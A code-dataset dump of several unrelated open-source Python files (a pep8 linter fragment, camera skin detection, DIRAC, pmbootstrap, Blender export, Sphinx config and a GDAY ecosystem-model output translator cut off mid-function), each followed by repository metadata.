return filename_match(filename, self.options.exclude)
def ignore_code(self, code):
"""Check if the error code should be ignored.
If 'options.select' contains a prefix of the error code,
return False. Else, if 'options.ignore' contains a prefix of
the error code, return True.
"""
if len(code) < 4 and any(s.startswith(code)
for s in self.options.select):
return False
return (code.startswith(self.options.ignore) and
not code.startswith(self.options.select))
def get_checks(self, argument_name):
"""Get all the checks for this category.
Find all globally visible functions where the first argument name
starts with argument_name and which contain selected tests.
"""
checks = []
for check, attrs in _checks[argument_name].items():
(codes, args) = attrs
if any(not (code and self.ignore_code(code)) for code in codes):
checks.append((check.__name__, check, args))
return sorted(checks)
def get_parser(prog='pep8', version=__version__):
parser = OptionParser(prog=prog, version=version,
usage="%prog [options] input ...")
parser.config_options = [
'exclude', 'filename', 'select', 'ignore', 'max-line-length',
'hang-closing', 'count', 'format', 'quiet', 'show-pep8',
'show-source', 'statistics', 'verbose']
parser.add_option('-v', '--verbose', default=0, action='count',
help="print status messages, or debug with -vv")
parser.add_option('-q', '--quiet', default=0, action='count',
help="report only file names, or nothing with -qq")
parser.add_option('-r', '--repeat', default=True, action='store_true',
help="(obsolete) show all occurrences of the same error")
parser.add_option('--first', action='store_false', dest='repeat',
help="show first occurrence of each error")
parser.add_option('--exclude', metavar='patterns', default=DEFAULT_EXCLUDE,
help="exclude files or directories which match these "
"comma separated patterns (default: %default)")
parser.add_option('--filename', metavar='patterns', default='*.py',
help="when parsing directories, only check filenames "
"matching these comma separated patterns "
"(default: %default)")
parser.add_option('--select', metavar='errors', default='',
help="select errors and warnings (e.g. E,W6)")
parser.add_option('--ignore', metavar='errors', default='',
help="skip errors and warnings (e.g. E4,W) "
"(default: %s)" % DEFAULT_IGNORE)
parser.add_option('--show-source', action='store_true',
help="show source code for each error")
parser.add_option('--show-pep8', action='store_true',
help="show text of PEP 8 for each error "
"(implies --first)")
parser.add_option('--statistics', action='store_true',
help="count errors and warnings")
parser.add_option('--count', action='store_true',
help="print total number of errors and warnings "
"to standard error and set exit code to 1 if "
"total is not null")
parser.add_option('--max-line-length', type='int', metavar='n',
default=MAX_LINE_LENGTH,
help="set maximum allowed line length "
"(default: %default)")
parser.add_option('--hang-closing', action='store_true',
help="hang closing bracket instead of matching "
"indentation of opening bracket's line")
parser.add_option('--format', metavar='format', default='default',
help="set the error format [default|pylint|<custom>]")
parser.add_option('--diff', action='store_true',
help="report only lines changed according to the "
"unified diff received on STDIN")
group = parser.add_option_group("Testing Options")
if os.path.exists(TESTSUITE_PATH):
group.add_option('--testsuite', metavar='dir',
help="run regression tests from dir")
group.add_option('--doctest', action='store_true',
help="run doctest on myself")
group.add_option('--benchmark', action='store_true',
help="measure processing speed")
return parser
def read_config(options, args, arglist, parser):
"""Read both user configuration and local configuration."""
config = RawConfigParser()
user_conf = options.config
if user_conf and os.path.isfile(user_conf):
if options.verbose:
print('user configuration: %s' % user_conf)
config.read(user_conf)
local_dir = os.curdir
parent = tail = args and os.path.abspath(os.path.commonprefix(args))
while tail:
if config.read([os.path.join(parent, fn) for fn in PROJECT_CONFIG]):
local_dir = parent
if options.verbose:
print('local configuration: in %s' % parent)
break
(parent, tail) = os.path.split(parent)
pep8_section = parser.prog
if config.has_section(pep8_section):
option_list = dict([(o.dest, o.type or o.action)
for o in parser.option_list])
# First, read the default values
(new_options, __) = parser.parse_args([])
# Second, parse the configuration
for opt in config.options(pep8_section):
if opt.replace('_', '-') not in parser.config_options:
print(" unknown option '%s' ignored" % opt)
continue
if options.verbose > 1:
print(" %s = %s" % (opt, config.get(pep8_section, opt)))
normalized_opt = opt.replace('-', '_')
opt_type = option_list[normalized_opt]
if opt_type in ('int', 'count'):
value = config.getint(pep8_section, opt)
elif opt_type == 'string':
value = config.get(pep8_section, opt)
if normalized_opt == 'exclude':
value = normalize_paths(value, local_dir)
else:
assert opt_type in ('store_true', 'store_false')
value = config.getboolean(pep8_section, opt)
setattr(new_options, normalized_opt, value)
# Third, overwrite with the command-line options
(options, __) = parser.parse_args(arglist, values=new_options)
options.doctest = options.testsuite = False
return options
def process_options(arglist=None, parse_argv=False, config_file=None,
parser=None):
"""Process options passed either via arglist or via command line args."""
if not parser:
parser = get_parser()
if not parser.has_option('--config'):
if config_file is True:
config_file = DEFAULT_CONFIG
group = parser.add_option_group("Configuration", description=(
"The project options are read from the [%s] section of the "
"tox.ini file or the setup.cfg file located in any parent folder "
"of the path(s) being processed. Allowed options are: %s." %
(parser.prog, ', '.join(parser.config_options))))
group.add_option('--config', metavar='path', default=config_file,
help="user config file location (default: %default)")
# Don't read the command line if the module is used as a library.
if not arglist and not parse_argv:
arglist = []
# If parse_argv is True and arglist is None, arguments are
# parsed from the command line (sys.argv)
(options, args) = parser.parse_args(arglist)
options.reporter = None
if options.ensure_value('testsuite', False):
args.append(options.testsuite)
elif not options.ensure_value('doctest', False):
if parse_argv and not args:
if options.diff or any(os.path.exists(name)
for name in PROJECT_CONFIG):
args = ['.']
else:
parser.error('input not specified')
options = read_config(options, args, arglist, parser)
options.reporter = parse_argv and options.quiet == 1 and FileReport
options.filename = options.filename and options.filename.split(',')
options.exclude = normalize_paths(options.exclude)
options.select = options.select and options.select.split(',')
options.ignore = options.ignore and options.ignore.split(',')
if options.diff:
options.reporter = DiffReport
stdin = stdin_get_value()
options.selected_lines = parse_udiff(stdin, options.filename, args[0])
args = sorted(options.selected_lines)
return options, args
def _main():
"""Parse options and run checks on Python source."""
import signal
# Handle "Broken pipe" gracefully
try:
signal.signal(signal.SIGPIPE, lambda signum, frame: sys.exit(1))
except AttributeError:
pass # not supported on Windows
pep8style = StyleGuide(parse_argv=True, config_file=True)
options = pep8style.options
if options.doctest or options.testsuite:
from testsuite.support import run_tests
report = run_tests(pep8style)
else:
report = pep8style.check_files()
if options.statistics:
report.print_statistics()
if options.benchmark:
report.print_benchmark()
if options.testsuite and not options.quiet:
report.print_results()
if report.total_errors:
if options.count:
sys.stderr.write(str(report.total_errors) + '\n')
sys.exit(1)
if __name__ == '__main__':
_main()
|
alexfalcucc/anaconda
|
anaconda_lib/linting/pep8.py
|
Python
|
gpl-3.0
| 79,405
|
#!/usr/bin/python
# import the necessary packages
from picamera.array import PiRGBArray
from picamera import PiCamera
import argparse
import datetime
import imutils
import time
import cv2
import numpy as np
# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-a", "--min-area", type=int, default=500, help="minimum area size")
args = vars(ap.parse_args())
# initialize the camera and grab a reference to the raw camera capture
camera = PiCamera()
camera.resolution = (320, 240)
camera.framerate = 32
rawCapture = PiRGBArray(camera, size=(320, 240))
# allow the camera to warmup
time.sleep(0.25)
# initialize the first frame in the video stream
firstFrame = None
lower = np.array([0, 133, 77], dtype="uint8")
upper = np.array([255, 173, 127], dtype="uint8")
# loop over the frames of the video
for frame in camera.capture_continuous(rawCapture, format="bgr", use_video_port=True):
# resize the frame, convert it to grayscale, and blur it
image = frame.array
#image = imutils.resize(image, width = 300)
hsvimg = cv2.cvtColor(image, cv2.COLOR_BGR2YCR_CB)
skinmask = cv2.inRange(hsvimg, lower, upper)
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (11,11))
skinmask = cv2.erode(skinmask, kernel, iterations = 2)
skinmask = cv2.dilate(skinmask, kernel, iterations = 2)
skinmask = cv2.GaussianBlur(skinmask, (3,3), 0)
skin = cv2.bitwise_and(image, image, mask = skinmask)
# show the frame and record if the user presses a key
cv2.imshow("images", np.hstack([image,skin]))
key = cv2.waitKey(1) & 0xFF
# clear the stream in preparation for the next frame
rawCapture.truncate(0)
# if the `q` key is pressed, break from the lop
if key == ord("q"):
break
# cleanup the camera and close any open windows
cv2.destroyAllWindows()
|
chiguire/lilibethsparade
|
opencv_tests/second_skin_detection.py
|
Python
|
gpl-3.0
| 1,816
|
#!/usr/bin/env python
########################################################################
# File : dirac-wms-get-queue-cpu-time.py
# Author : Federico Stagni
########################################################################
"""
Report CPU length of queue, in seconds
This script is used by the dirac-pilot script to set the CPUTime left, which is a limit for the matching
"""
import DIRAC
from DIRAC.Core.Base.Script import Script
@Script()
def main():
Script.registerSwitch("C:", "CPUNormalizationFactor=", "CPUNormalizationFactor, in case it is known")
Script.parseCommandLine(ignoreErrors=True)
CPUNormalizationFactor = 0.0
for unprocSw in Script.getUnprocessedSwitches():
if unprocSw[0] in ("C", "CPUNormalizationFactor"):
CPUNormalizationFactor = float(unprocSw[1])
from DIRAC.WorkloadManagementSystem.Client.CPUNormalization import getCPUTime
cpuTime = getCPUTime(CPUNormalizationFactor)
# I hate this kind of output... PhC
print("CPU time left determined as", cpuTime)
DIRAC.exit(0)
if __name__ == "__main__":
main()
|
DIRACGrid/DIRAC
|
src/DIRAC/WorkloadManagementSystem/scripts/dirac_wms_get_queue_cpu_time.py
|
Python
|
gpl-3.0
| 1,107
|
"""
Copyright 2018 Pablo Castellano
This file is part of pmbootstrap.
pmbootstrap is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
pmbootstrap is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with pmbootstrap. If not, see <http://www.gnu.org/licenses/>.
"""
import logging
import pmb.config
import pmb.helpers.git
def write_os_release(args, suffix):
logging.info("(" + suffix + ") write /etc/os-release")
revision = pmb.helpers.git.rev_parse(args)
filepath = args.work + "/chroot_" + suffix + "/tmp/os-release"
os_release = ('PRETTY_NAME="postmarketOS {version}"\n'
'NAME="postmarketOS"\n'
'VERSION_ID="{version}"\n'
'VERSION="{version}-{hash:.8}"\n'
'ID="postmarketos"\n'
'ID_LIKE="alpine"\n'
'HOME_URL="https://www.postmarketos.org/"\n'
'SUPPORT_URL="https://github.com/postmarketOS/"\n'
'BUG_REPORT_URL="https://github.com/postmarketOS/"\n'
'PMOS_HASH="{hash}"\n'
).format(version=pmb.config.version, hash=revision)
with open(filepath, "w") as handle:
handle.write(os_release)
pmb.chroot.root(args, ["mv", "/tmp/os-release", "/etc/os-release"], suffix)
|
postmarketOS/pmbootstrap
|
pmb/install/file.py
|
Python
|
gpl-3.0
| 1,698
|
import signal
import os
import time
def receive_signal(signum, stack):
print('Received: %s', signum)
signal.signal(signal.SIGUSR1, receive_signal)
signal.signal(signal.SIGUSR2, receive_signal)
print('My PID is: %s', os.getpid())
while True:
print('Waiting...')
time.sleep(3)
|
davidam/python-examples
|
signals/signal_signal.py
|
Python
|
gpl-3.0
| 291
|
import struct
import glob
import argparse
parser = argparse.ArgumentParser(description="Take a folder with the .AFM files generated by makeBinary.py and compile all the files into one .AFMDATA file")
parser.add_argument("-i", "--input_folder", default="input.scan", help="the path to the input .SCAN file (default: %(default)s)")
args = parser.parse_args()
if not args.input_folder.endswith('/'):
inFolder = args.input_folder+'/'
else:
inFolder = args.input_folder
countOut = 0
compiledCoutFile = open(inFolder + inFolder.split('/')[-2] + '.afmdata', "wb+")
compiledCoutFile.write(struct.pack('i', countOut))
for outFilePath in glob.glob(inFolder+"*.afm"):
outFile = open(outFilePath, "rb")
countOut += 1
compiledCoutFile.write(outFile.read())
outFile.close()
compiledCoutFile.seek(0)
compiledCoutFile.write(struct.pack('i', countOut))
compiledCoutFile.close()
|
SINGROUP/readAFM
|
databaseCode/compileOut.py
|
Python
|
gpl-3.0
| 891
|
"""
Copyright (C) 2018 Quinn D Granfor <spootdev@gmail.com>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
version 2, as published by the Free Software Foundation.
This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License version 2 for more details.
You should have received a copy of the GNU General Public License
version 2 along with this program; if not, write to the Free
Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
MA 02110-1301, USA.
"""
# will most likely need to run following on HOST
# sysctl -w vm.max_map_count=262144
import sys
try:
from common import common_docker
except ModuleNotFoundError:
print('Must install docker via "pip3 install docker". Exiting...', flush=True)
sys.exit()
# map count limit, vm.max_map_count
with open('/proc/sys/vm/max_map_count') as f:
max_map_count = int(f.read())
if max_map_count < 262144:
print(
'Map count too small. Run "sysctl -w vm.max_map_count=262144" as root and rerun.'
' Exiting...', flush=True)
sys.exit()
docker_inst = common_docker.CommonDocker()
# get current working directory from host maps
# this is used so ./data can be used for all the containers launched from docker-py
# using reactor since it should always be running
current_host_working_directory = docker_inst.com_docker_container_bind(container_name='/mkreactor',
bind_match='/data/certs')
if current_host_working_directory is None:
print('Please start the containers so path can be found.'
' Exiting...', flush=True)
sys.exit()
docker_inst.com_docker_network_prune()
docker_inst.com_docker_network_create()
docker_inst.com_docker_run_elk(current_host_working_directory)
# docker_inst.com_docker_run_pgadmin()
# docker_inst.com_docker_run_portainer(current_host_working_directory)
|
MediaKraken/MediaKraken_Deployment
|
source/main_debug.py
|
Python
|
gpl-3.0
| 2,125
|
import bpy
import dsf.prop_writer
class ExportDsfProp (bpy.types.Operator):
"""export a dsf prop file.
"""
bl_idname = "export_scene.dsf_prop"
bl_label = "Export Dsf Props"
filepath = bpy.props.StringProperty\
('file path', description = 'file path of the .duf file')
output_group = bpy.props.StringProperty\
('group', description = 'subdirectory for data directory')
rotate_yup = bpy.props.BoolProperty\
('y-up', description = 'rotate y-axis up', default = True)
export_scale = bpy.props.FloatProperty\
('scale', description = 'scale factor for exporting',
min = 1, max = 1000, soft_min = 1, soft_max = 100, default = 100)
def execute (self, ctx):
"""export selected objects as dsf."""
filepath = self.filepath
output_group = self.output_group
scale = self.export_scale
rotate = self.rotate_yup
dsf.prop_writer.export_prop (ctx, filepath, output_group, scale, rotate)
return {'FINISHED'}
def invoke (self, ctx, evt):
"""run the operator interactively.
"""
ctx.window_manager.fileselect_add (self)
return {'RUNNING_MODAL'}
def register ():
bpy.utils.register_class (ExportDsfProp)
def unregister ():
bpy.utils.unregister_class (ExportDsfProp)
def reload ():
import imp
import dsf.path_util, dsf.prop_writer, dsf.geom_create, dsf.scene_writer
import dsf.geom_writer
imp.reload (dsf.path_util)
imp.reload (dsf.geom_create)
imp.reload (dsf.prop_writer)
imp.reload (dsf.scene_writer)
imp.reload (dsf.geom_writer)
unregister ()
register ()
|
millighost/dsf-utils
|
modules/dsf/export_prop_op.py
|
Python
|
gpl-3.0
| 1,552
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Python Library documentation build configuration file, created by
# sphinx-quickstart on Fri Aug 19 21:38:54 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('../py_lib'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.imgmath',
'sphinx.ext.ifconfig',
'sphinx.ext.viewcode',
'sphinx.ext.githubpages',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'Python Library'
copyright = '2016, Aman A. Tiwari'
author = 'Aman A. Tiwari'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.2'
# The full version, including alpha/beta/rc tags.
release = '1.2'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#
# today = ''
#
# Else, today_fmt is used as the format for a strftime call.
#
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
import sphinx_rtd_theme
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents.
# "<project> v<release> documentation" by default.
#
# html_title = 'Python Library v1.2'
# A shorter title for the navigation bar. Default is the same as html_title.
#
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#
# html_logo = None
# The name of an image file (relative to this directory) to use as a favicon of
# the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#
# html_extra_path = []
# If not None, a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
# The empty string is equivalent to '%b %d, %Y'.
#
# html_last_updated_fmt = None
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#
# html_additional_pages = {}
# If false, no module index is generated.
#
# html_domain_indices = True
# If false, no index is generated.
#
# html_use_index = True
# If true, the index is split into individual pages for each letter.
#
# html_split_index = False
# If true, links to the reST sources are added to the pages.
#
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'h', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'r', 'sv', 'tr', 'zh'
#
# html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# 'ja' uses this config value.
# 'zh' user can custom change `jieba` dictionary path.
#
# html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#
# html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'PythonLibrarydoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'PythonLibrary.tex', 'Python Library Documentation',
'Aman A. Tiwari', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#
# latex_use_parts = False
# If true, show page references after internal links.
#
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
#
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
#
# latex_appendices = []
# It false, will not define \strong, \code, itleref, \crossref ... but only
# \sphinxstrong, ..., \sphinxtitleref, ... To help avoid clash with user added
# packages.
#
# latex_keep_old_macro_names = True
# If false, no module index is generated.
#
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'pythonlibrary', 'Python Library Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'PythonLibrary', 'Python Library Documentation',
author, 'PythonLibrary', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#
# texinfo_appendices = []
# If false, no module index is generated.
#
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#
# texinfo_no_detailmenu = False
# -- Options for Epub output ----------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
epub_author = author
epub_publisher = author
epub_copyright = copyright
# The basename for the epub file. It defaults to the project name.
# epub_basename = project
# The HTML theme for the epub output. Since the default themes are not
# optimized for small screen space, using the same theme for HTML and epub
# output is usually not wise. This defaults to 'epub', a theme designed to save
# visual space.
#
# epub_theme = 'epub'
# The language of the text. It defaults to the language option
# or 'en' if the language is not set.
#
# epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
# epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#
# epub_identifier = ''
# A unique identification for the text.
#
# epub_uid = ''
# A tuple containing the cover image and cover page html template filenames.
#
# epub_cover = ()
# A sequence of (type, uri, title) tuples for the guide element of content.opf.
#
# epub_guide = ()
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#
# epub_pre_files = []
# HTML files that should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#
# epub_post_files = []
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
# The depth of the table of contents in toc.ncx.
#
# epub_tocdepth = 3
# Allow duplicate toc entries.
#
# epub_tocdup = True
# Choose between 'default' and 'includehidden'.
#
# epub_tocscope = 'default'
# Fix unsupported image types using the Pillow.
#
# epub_fix_images = False
# Scale large images.
#
# epub_max_image_width = 0
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#
# epub_show_urls = 'inline'
# If false, no index is generated.
#
# epub_use_index = True
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'https://docs.python.org/': None}
|
amanabt/pylib
|
source/conf.py
|
Python
|
gpl-3.0
| 12,361
|
#!/usr/bin/env python
# coding: utf-8
""" Translate GDAY output file
Match the NCEAS format and while we are at it carry out unit conversion so that
we matched required standard. Data should be comma-delimited
"""
import shutil
import os
import numpy as np
import csv
import sys
#import matplotlib.pyplot as plt
import datetime as dt
import pandas as pd
#from io import StringIO
from io import BytesIO
__author__ = "Martin De Kauwe"
__version__ = "1.0 (12.05.2014)"
__email__ = "mdekauwe@gmail.com"
def date_converter(*args):
return dt.datetime.strptime(str(int(float(args[0]))) + " " +\
str(int(float(args[1]))), '%Y %j')
def translate_output(infname):
outdir = "../outputs"
UNDEF = -9999.
units = setup_units()
variable, variable_names = setup_varnames()
# load met stuff, i.e. the stuff needed for NCEAS output that G'day
# does not output
# envir = load_met_input_data(met_fname)
# load the rest of the g'day output
(gday, git_ver) = load_gday_output(infname)
# merge dictionaries to ease output
data_dict = dict(envir, **gday)
ofname = os.path.join(outdir, "temp.nceas")
f = open(ofname, "w")
f.write("%s" % (git_ver))
# write output in csv format
writer = csv.writer(f, dialect=csv.excel, lineterminator="\n")
writer.writerow(variable)
writer.writerow(units)
writer.writerow(variable_names)
for i in range(len(gday['DOY'])):
writer.writerow([("%.8f" % (float(data_dict[k][i])) \
if k in data_dict else UNDEF)
for k in variable_names])
# Need to replace the temp file with the infname which is actually
# the filename we want to use
shutil.move(ofname, infname)
def remove_comments_from_header(fname):
""" I have made files with comments which means the headings can't be
parsed to get dictionary headers for pandas! Solution is to remove these
comments first """
#s = StringIO()
s = BytesIO()
with open(fname) as f:
for line in f:
if '#' in line:
line = line.replace("#", "").lstrip(' ')
s.write(line)
s.seek(0) # "rewind" to the beginning of the StringIO object
return s
def remove_comments_from_header_and_get_git_rev(fname):
""" I have made files with comments which means the headings can't be
parsed to get dictionary headers for pandas! Solution is to remove these
comments first """
#s = StringIO()
s = BytesIO()
with open(fname) as f:
line_counter = 0
for line in f:
if line_counter == 0:
git_ver = line.rstrip(' ')
if '#' in line:
line = line.replace("#", "").lstrip(' ')
s.write(line)
line_counter += 1
s.seek(0) # "rewind" to the beginning of the StringIO object
return s, git_ver
def load_met_input_data(fname):
MJ_TO_MOL = 4.6
SW_TO_PAR = 0.48
DAYS_TO_HRS = 24.0
UMOL_TO_MOL = 1E-6
tonnes_per_ha_to_g_m2 = 100.0
s = remove_comments_from_header(fname)
met_data = pd.read_csv(s, parse_dates=[[0,1]], skiprows=4, index_col=0,
sep=",", keep_date_col=True,
date_parser=date_converter)
precip = met_data["rain"]
par = (met_data["par_am"] + met_data["par_pm"]) * MJ_TO_MOL
air_temp = met_data["tair"]
soil_temp = met_data["tsoil"]
vpd = (met_data["vpd_am"] + met_data["vpd_pm"]) / 2.0
co2 = met_data["co2"]
ndep = met_data["ndep"] * tonnes_per_ha_to_g_m2
return {'CO2': co2, 'PREC':precip, 'PAR':par, 'TAIR':air_temp, 'TSOIL':soil_temp,
'VPD':vpd, 'NDEP':ndep}
def load_gday_output(fname):
SW_RAD_TO_PAR = 2.3
UNDEF = -9999.
tonnes_per_ha_to_g_m2 = 100
yr_to_day = 365.25
(s, git_ver) = remove_comments_from_header_and_get_git_rev(fname)
out = pd.read_csv(s, parse_dates=[[0,1]], skiprows=1, index_col=0,
sep=",", keep_date_col=True, date_parser=date_converter)
year = out["year"]
doy = out["doy"]
# state outputs
pawater_root = out["pawater_root"]
shoot = out["shoot"] * tonnes_per_ha_to_g_m2
stem = out["stem"] * tonnes_per_ha_to_g_m2
branch = out["branch"] * tonnes_per_ha_to_g_m2
fine_root = out["root"] * tonnes_per_ha_to_g_m2
coarse_root = out["croot"] * tonnes_per_ha_to_g_m2
coarse_rootn = out["crootn"] * tonnes_per_ha_to_g_m2
litterc = out["litterc"] * tonnes_per_ha_to_g_m2
littercag = out["littercag"] * tonnes_per_ha_to_g_m2
littercbg = out["littercbg"] * tonnes_per_ha_to_g_m2
soilc = out["soilc"] * tonnes_per_ha_to_g_m2
lai = out["lai"]
shootn = out["shootn"] * tonnes_per_ha_to_g_m2
stemn = out["stemn"] * tonnes_per_ha_to_g_m2
branchn = out["branchn"] * tonnes_per_ha_to_g_m2
rootn = out["rootn"] * tonnes_per_ha_to_g_m2
crootn = out["crootn"] * tonnes_per_ha_to_g_m2
litternag = out["litternag"] * tonnes_per_ha_to_g_m2
litternbg = out["litternbg"] * tonnes_per_ha_to_g_m2
nsoil = out["soiln"] * tonnes_per_ha_to_g_m2
inorgn = out["inorgn"] * tonnes_per_ha_to_g_m2
tnc = out["cstore"] * tonnes_per_ha_to_g_m2
nstorage = out["nstore"] * tonnes_per_ha_to_g_m2
pstorage = out["pstore"] * tonnes_per_ha_to_g_m2
activesoiln = out["activesoiln"] * tonnes_per_ha_to_g_m2
slowsoiln = out["slowsoiln"] * tonnes_per_ha_to_g_m2
passivesoiln = out["passivesoiln"] * tonnes_per_ha_to_g_m2
npoolo = activesoiln + slowsoiln + passivesoiln
shootp = out["shootp"] * tonnes_per_ha_to_g_m2
stemp = out["stemp"] * tonnes_per_ha_to_g_m2
branchp = out["branchp"] * tonnes_per_ha_to_g_m2
rootp = out["rootp"] * tonnes_per_ha_to_g_m2
crootp = out["crootp"] * tonnes_per_ha_to_g_m2
litterpag = out["litterpag"] * tonnes_per_ha_to_g_m2
litterpbg = out["litterpbg"] * tonnes_per_ha_to_g_m2
psoil = out["soilp"] * tonnes_per_ha_to_g_m2
inorgp = out["inorgp"] * tonnes_per_ha_to_g_m2
inorglabp = out["inorglabp"] * tonnes_per_ha_to_g_m2
inorgsorbp = out["inorgsorbp"] * tonnes_per_ha_to_g_m2
inorgavlp = out["inorgavlp"] * tonnes_per_ha_to_g_m2
inorgssorbp = out["inorgssorbp"] * tonnes_per_ha_to_g_m2
inorgoccp = out["inorgoccp"] * tonnes_per_ha_to_g_m2
inorgparp = out["inorgparp"] * tonnes_per_ha_to_g_m2
activesoilp = out["activesoilp"] * tonnes_per_ha_to_g_m2
slowsoilp = out["slowsoilp"] * tonnes_per_ha_to_g_m2
passivesoilp = out["passivesoilp"] * tonnes_per_ha_to_g_m2
ppoolo = activesoilp + slowsoilp + passivesoilp
# fluxes outputs
